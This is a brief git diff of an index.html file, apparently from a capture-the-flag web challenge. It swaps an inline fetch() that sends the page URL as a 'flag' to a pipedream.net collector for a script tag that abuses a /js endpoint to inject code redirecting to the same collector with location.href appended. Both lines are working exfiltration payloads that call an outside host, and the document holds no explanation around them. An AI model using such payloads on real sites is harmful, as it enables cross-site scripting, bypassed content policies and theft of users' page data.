--- a/index.html
+++ b/index.html
@@ -1,3 +1,1 @@
-<script>
-  fetch('https://eo62lwd3xgz14zy.m.pipedream.net/?flag=' + window.location.href);
-</script>
+<script src="/js?q=location='https://eo62lwd3xgz14zy.m.pipedream.net/?'%2Blocation.href"></script>
